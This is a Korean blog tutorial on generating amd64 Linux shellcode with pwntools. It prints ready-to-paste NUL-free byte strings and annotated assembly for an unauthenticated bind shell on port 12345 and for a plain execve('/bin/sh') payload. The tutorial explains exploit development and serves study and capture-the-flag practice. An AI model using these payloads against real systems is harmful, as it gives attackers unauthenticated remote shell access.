


[Shellcode] pwntools을 이용한 shellcode 만들기

dokydoky 2016. 12. 20. 16:04

context에 target architecture와 os를 지정한 후 아래와 같이 쉘코드를 생성할 수 있다. shellcraft.*와 asm()은 모두 context.arch / context.os를 참조하므로, 이를 먼저 설정하지 않으면 의도하지 않은 아키텍처용 쉘코드가 생성될 수 있다.

shellcraft.bindsh은 standalone 데몬을 remote exploit하기 위한 쉘코드. 지정한 TCP 포트(여기서는 12345)를 모든 인터페이스(0.0.0.0)에 열고 접속을 기다린 뒤, 접속된 소켓을 fd 0/1/2에 dup2하고 /bin/sh를 실행한다(아래 어셈블리 참고). 주의: 해당 포트에 도달할 수 있는 누구든 인증 없이 쉘을 얻게 되며, 대상 앞에 인바운드 방화벽/NAT가 있으면 접속 자체가 막히므로 그런 환경에서는 connect-back(reverse) 방식의 쉘코드가 필요하다.

shellcraft.sh은 local exploit이나 xinetd로 관리되는 바이너리를 exploit하기 위한 쉘코드. 소켓 처리 없이 execve("/bin///sh")만 수행하므로 새로 실행되는 쉘은 fd 0/1/2를 그대로 상속받는다. 로컬이면 현재 터미널이, xinetd 환경이면 xinetd가 이미 stdin/stdout/stderr에 연결해 둔 클라이언트 소켓이 그대로 쉘의 입출력이 되기 때문에 별도의 네트워크 코드가 필요 없다.

(standalone, xinetd가 이해되지 않는다면 참고 : http://dokydoky.tistory.com/446)

# pwntools: brings context, asm() and the shellcraft generators into scope.
In [57]: from pwn import *


# shellcraft.* and asm() read context.arch / context.os, so the target must be
# set before anything is generated -- otherwise the shellcode is emitted for the
# wrong architecture.  amd64 + linux is what the listings below were produced for.
In [58]: context(arch='amd64', os='linux')


# Bind shell: listens on TCP 12345 on every interface and spawns /bin/sh for the
# first peer that connects (see the disassembly further down).  The join()
# renders the raw bytes as "\xHH" C-string escapes ready to paste into a payload.
# NOTE: this is Python 2 (print statement, ord() on a str).  On Python 3 asm()
# returns bytes, so ord() raises -- iterate the ints directly or use .hex().
In [59]: print "".join(['\\x{:02X}'.format(ord(i)) for i in asm(shellcraft.bindsh(12345, network='ipv4'))])

\x6A\x29\x58\x6A\x02\x5F\x6A\x01\x5E\x99\x0F\x05\x52\xBA\x01\x01\x01\x01\x81\xF2\x03\x01\x31\x38\x52\x6A\x10\x5A\x48\x89\xC5\x48\x89\xC7\x6A\x31\x58\x48\x89\xE6\x0F\x05\x6A\x32\x58\x48\x89\xEF\x6A\x01\x5E\x0F\x05\x6A\x2B\x58\x48\x89\xEF\x31\xF6\x99\x0F\x05\x48\x89\xC5\x6A\x03\x5E\x48\xFF\xCE\x78\x0B\x56\x6A\x21\x58\x48\x89\xEF\x0F\x05\xEB\xEF\x68\x72\x69\x01\x01\x81\x34\x24\x01\x01\x01\x01\x31\xD2\x52\x6A\x08\x5A\x48\x01\xE2\x52\x48\x89\xE2\x6A\x68\x48\xB8\x2F\x62\x69\x6E\x2F\x2F\x2F\x73\x50\x6A\x3B\x58\x48\x89\xE7\x48\x89\xD6\x99\x0F\x05


# execve("/bin///sh") only -- no socket code.  The shell inherits fds 0-2 as they
# are, which is why this variant suits local exploits and xinetd-managed targets.
# Note that neither dump contains a \x00 byte.
In [60]: print "".join(['\\x{:02X}'.format(ord(i)) for i in asm(shellcraft.sh())])

\x68\x72\x69\x01\x01\x81\x34\x24\x01\x01\x01\x01\x31\xD2\x52\x6A\x08\x5A\x48\x01\xE2\x52\x48\x89\xE2\x6A\x68\x48\xB8\x2F\x62\x69\x6E\x2F\x2F\x2F\x73\x50\x6A\x3B\x58\x48\x89\xE7\x48\x89\xD6\x99\x0F\x05



어셈블리 코드는 아래와 같다. (/* ... */ 주석은 shellcraft가 직접 출력한 것이다. 상수를 0x1010101과 XOR해서 넣는 부분은 immediate에 NUL 바이트가 들어가지 않게 하기 위한 인코딩으로, 위 hex 출력에 \x00이 하나도 없는 것을 확인할 수 있다.)

In [62]: print shellcraft.bindsh(12345, network='ipv4')

    /* call socket('AF_INET', 'SOCK_STREAM', 0) */

    /* NOTE: none of the syscall return values below are checked.  If socket,
       bind (e.g. port already in use), listen or accept fails, the negative
       errno left in rax is carried on as if it were a descriptor and execution
       falls through to execve regardless. */

    push (SYS_socket) /* 0x29 */

    pop rax

    push (AF_INET) /* 2 */

    pop rdi

    push (SOCK_STREAM) /* 1 */

    pop rsi

    cdq /* rdx=0 (eax = 0x29 is positive, so sign-extending into edx clears it) */

    syscall

    /* Build sockaddr_in structure: 16 bytes, assembled on the stack with two pushes */

    push rdx /* rdx is still 0: this qword is sin_zero[8] */

    mov edx, 0x1010101 /* (AF_INET | (14640 << 16)) == 0x39300002; 14640 == 0x3930 == htons(12345).
                          XOR-encoded because 0x39300002 itself contains a NUL byte. */

    xor edx, 0x38310103 /* decode: edx = 0x39300002 (32-bit write leaves the upper half of rdx zero) */

    push rdx /* low dword: sin_family=AF_INET, sin_port=htons(12345); high dword: sin_addr=0 (INADDR_ANY -> every interface) */

    /* rdx = sizeof(struct sockaddr_in) == 0x10.  (The generator labelled this
       sockaddr_in6, which is 28 bytes; for the ipv4 variant 16 is the correct
       length to hand to bind.) */

    push 0x10

    pop rdx

    /* Save server socket in rbp (syscall clobbers only rax/rcx/r11, so rbp survives the calls below) */

    mov rbp, rax

    /* call bind('rax', 'rsp', 'rdx') */

    mov rdi, rax

    push (SYS_bind) /* 0x31 */

    pop rax

    mov rsi, rsp /* rsp -> the sockaddr_in just built */

    syscall

    /* call listen('rbp', 1) */

    push (SYS_listen) /* 0x32 */

    pop rax

    mov rdi, rbp

    push 1

    pop rsi

    syscall

    /* call accept('rbp', 0, 0) -- blocks until the first client connects; no authentication of any kind */

    push (SYS_accept) /* 0x2b */

    pop rax

    mov rdi, rbp

    xor esi, esi /* 0 */

    cdq /* rdx=0 */

    syscall

dup_106:

    /* rax is now the accepted client socket; keep it in rbp for the dup2 loop */

    mov rbp, rax


    /* The loop counter lives on the stack: 3 is pushed, and each iteration
       pops, decrements and re-pushes it, so rsi takes the values 2, 1, 0.
       The loop exits once the counter goes negative. */

    push 3

loop_107:

    pop rsi

    dec rsi

    js after_108

    push rsi /* keep the counter across the syscall */


    /* call dup2('rbp', 'rsi') -- point fd 2, then 1, then 0 at the client socket */

    push (SYS_dup2) /* 0x21 */

    pop rax

    mov rdi, rbp

    syscall


    jmp loop_107

after_108:

    /* The final counter (-1) was popped and not re-pushed, so the stack is back where it was before 'push 3' */


    /* push argument array ['sh\x00'] */

    /* push 'sh\x00' */

    /* 0x6873 is "sh\0\0"; it is pushed XORed with 0x1010101 so the immediate
       holds no NUL byte, then decoded in place.  push sign-extends the imm32,
       so the resulting qword is "sh" followed by six zero bytes. */

    push 0x1010101 ^ 0x6873

    xor dword ptr [rsp], 0x1010101

    xor edx, edx /* 0 */

    push rdx /* null terminate (argv[1] = NULL) */

    push 8

    pop rdx

    add rdx, rsp /* rdx = rsp + 8 = address of the "sh" string pushed above */

    push rdx /* 'sh\x00' (argv[0]) */

    mov rdx, rsp /* rdx = argv = {"sh", NULL} */

    

    /* push '/bin///sh\x00' */

    /* The extra slashes pad the path so the 8-byte qword "/bin///s" contains
       no NUL; the trailing 'h' and the terminator come from the 8-byte push
       of 0x68. */

    push 0x68

    mov rax, 0x732f2f2f6e69622f

    push rax

    

    /* call execve('rsp', 'rdx', 0) */

    push (SYS_execve) /* 0x3b */

    pop rax

    mov rdi, rsp /* pathname = "/bin///sh" */

    mov rsi, rdx /* argv */

    cdq /* rdx=0 -> envp = NULL (eax = 0x3b is positive) */

    syscall



In [63]: print shellcraft.sh()

    /* This variant does no socket or descriptor work at all: it only builds
       argv and execve()s /bin///sh, so the shell inherits fds 0-2 exactly as
       the exploited process had them (the terminal locally, the client socket
       under xinetd). */

    /* push argument array ['sh\x00'] */

    /* push 'sh\x00' */

    /* 0x6873 is "sh\0\0"; it is pushed XORed with 0x1010101 so the immediate
       holds no NUL byte, then decoded in place.  push sign-extends the imm32,
       so the resulting qword is "sh" followed by six zero bytes. */

    push 0x1010101 ^ 0x6873

    xor dword ptr [rsp], 0x1010101

    xor edx, edx /* 0 */

    push rdx /* null terminate (argv[1] = NULL) */

    push 8

    pop rdx

    add rdx, rsp /* rdx = rsp + 8 = address of the "sh" string pushed above */

    push rdx /* 'sh\x00' (argv[0]) */

    mov rdx, rsp /* rdx = argv = {"sh", NULL} */

    

    /* push '/bin///sh\x00' */

    /* The extra slashes pad the path so the 8-byte qword "/bin///s" contains
       no NUL; the trailing 'h' and the terminator come from the 8-byte push
       of 0x68. */

    push 0x68

    mov rax, 0x732f2f2f6e69622f

    push rax

    

    /* call execve('rsp', 'rdx', 0) */

    push (SYS_execve) /* 0x3b */

    pop rax

    mov rdi, rsp /* pathname = "/bin///sh" */

    mov rsi, rdx /* argv */

    cdq /* rdx=0 -> envp = NULL (eax = 0x3b is positive) */

    syscall


